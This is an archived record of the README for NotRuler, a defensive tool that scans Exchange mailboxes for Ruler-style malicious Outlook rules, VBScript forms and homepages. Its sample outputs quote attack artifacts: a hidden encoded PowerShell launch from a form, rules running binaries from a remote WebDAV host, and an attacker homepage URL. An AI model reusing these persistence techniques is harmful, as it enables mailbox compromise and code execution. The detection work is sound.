{
	"id": "34131e00-b98c-447c-be64-a0b32e47ee8b",
	"created_at": "2026-04-06T02:11:27.006123Z",
	"updated_at": "2026-04-10T13:12:30.418652Z",
	"deleted_at": null,
	"sha1_hash": "f4babc5a8cfc597cbf3b381a9726d228196c5227",
	"title": "GitHub - sensepost/notruler: The opposite of Ruler, provides blue teams with the ability to detect Ruler usage against Exchange.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 66392,
	"plain_text": "GitHub - sensepost/notruler: The opposite of Ruler, provides blue\r\nteams with the ability to detect Ruler usage against Exchange.\r\nBy Etienne Stalmans\r\nArchived: 2026-04-06 01:54:04 UTC\r\nIntroduction\r\nNotRuler is the opposite of Ruler. The tool aims to make life a little easier for Exchange Admins by allowing for\r\nthe detection of both client-side rules and VBScript enabled forms. At a minimum this should allow for the\r\ndetection of all attacks created through Ruler.\r\nNotRuler allows you to interact with Exchange servers remotely, through either the MAPI/HTTP or RPC/HTTP\r\nprotocol.\r\nWhat does it do?\r\nNotRuler can query one or more Exchange mailboxes and detect client-side Outlook rules and VBScript enabled\r\nforms.\r\nAllows Exchange Admins to check for compromise\r\nCheck your own account for compromise\r\nExtract stager address for malicious rules\r\nExtract VBScript used in forms\r\nCheck for 'homepage' and extract URL\r\nGetting Started\r\nCompiled binaries for Linux, OSX and Windows are available. Find these in Releases. Information about setting\r\nup Ruler from source is found in the [getting-started guide].\r\nNotRuler has the following modes of operation:\r\nRules -- check for client-side rules\r\nForms -- check for VBScript enabled forms\r\nHomepage -- check for a custom homepage\r\nRules\r\nThe current version of NotRuler can check either a single or multiple mailboxes. These are supplied in the\r\nprogram arguments.\r\nTo check multiple mailboxes, create a file with one account per line:\r\nhttps://github.com/sensepost/notruler\r\nPage 1 of 4\n\njohn.ford@testdomain.com\r\nhenry.hammond@testdomain.com\r\njames.smith@testdomain.com\r\ncindy.shell@testdomain.com\r\nUsing the Exchange Admin account, you should be able to log into any mailbox on the Exchange server:\r\n./notruler --username exchangeadmin --mailboxes /path/to/mailbox.list rules\r\nYou can also check your own account by using --self:\r\n./notruler --username john.ford@testdomain.com --mailbox john.ford@testdomain.com --self rules\r\nSample output:\r\n[+] Checking [john.ford@testdomain.com]\r\n[+] Found 5 rules\r\n[WARNING] Found client-side rule: [01000000d97851c4:pewpew3] Application: [\\\\myhost.somewhere.darkside.com\\dav\\m\r\n[WARNING] Found client-side rule: [01000000d97851b9:pewpew] Application: [\\\\myhost.somewhere.darkside.com\\dav\\ba\r\n[+] Checking [cindy.shell@testdomain.com]\r\n[+] No Rules Found\r\n[+] Checking [henry.hammond@testdomain.com]\r\n[+] No Rules Found\r\n[+] Checking [james.smith@testdomain.com]\r\n[+] No Rules Found\r\nForms\r\nSame as with Rules, you need to either have a list of mailboxes or a single mailbox to check. Simply swap \"rules\"\r\nfor \"forms\":\r\nUsing the Exchange Admin account, you should be able to log into any mailbox on the Exchange server:\r\n./notruler --username exchangeadmin --mailboxes /path/to/mailbox.list forms\r\nYou can also check your own account by using --self:\r\n./notruler --username john.ford@testdomain.com --mailbox john.ford@testdomain.com --self forms\r\nSample output:\r\n[+] Checking [john.ford@testdomain.com]\r\n[WARNING] Found form with VBScript! [IPM.Note.badform]\r\n Function P()\r\nCreateObject(\"Wscript.Shell\").Run \"powershell.exe -NoP -sta -NonI -W Hidden -Enc WwBTAFkAUwB0AEUAbQAuAE4AZQBUAC4\r\n[+] Checking [cindy.shell@testdomain.com]\r\n[+] Checking [henry.hammond@testdomain.com]\r\n[+] Checking [james.smith@testdomain.com]\r\nHomepage\r\nAnd the same again: you need to either have a list of mailboxes or a single mailbox to check.\r\nUsing the Exchange Admin account, you should be able to log into any mailbox on the Exchange server:\r\n./notruler --username exchangeadmin --mailboxes /path/to/mailbox.list homepage\r\nYou can also check your own account by using --self:\r\n./notruler --username john.ford@testdomain.com --mailbox john.ford@testdomain.com --self homepage\r\nSample output:\r\n[+] Checking [john.ford@testdomain.com]\r\n[WARNING] Found endpoint: http://attack.attackpew.com/rce.html\r\n[+] Webview is set as ENABLED\r\n[+] Checking [cindy.shell@testdomain.com]\r\n[+] Checking [henry.hammond@testdomain.com]\r\n[+] Checking [james.smith@testdomain.com]\r\nIOCs\r\nI've added a list of IOCs here: iocs.md\r\nFeel free to submit Issues/PRs with further IOCs!\r\nLicense\r\nLicense CC BY-NC-SA 4.0\r\nNotRuler is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International\r\nLicense (http://creativecommons.org/licenses/by-nc-sa/4.0/). Permissions beyond the scope of this license may be\r\navailable at http://sensepost.com/contact/.\r\nSource: https://github.com/sensepost/notruler",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://github.com/sensepost/notruler"
	],
	"report_names": [
		"notruler"
	],
	"threat_actors": [],
	"ts_created_at": 1775441487,
	"ts_updated_at": 1775826750,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f4babc5a8cfc597cbf3b381a9726d228196c5227.pdf",
		"text": "https://archive.orkl.eu/f4babc5a8cfc597cbf3b381a9726d228196c5227.txt",
		"img": "https://archive.orkl.eu/f4babc5a8cfc597cbf3b381a9726d228196c5227.jpg"
	}
}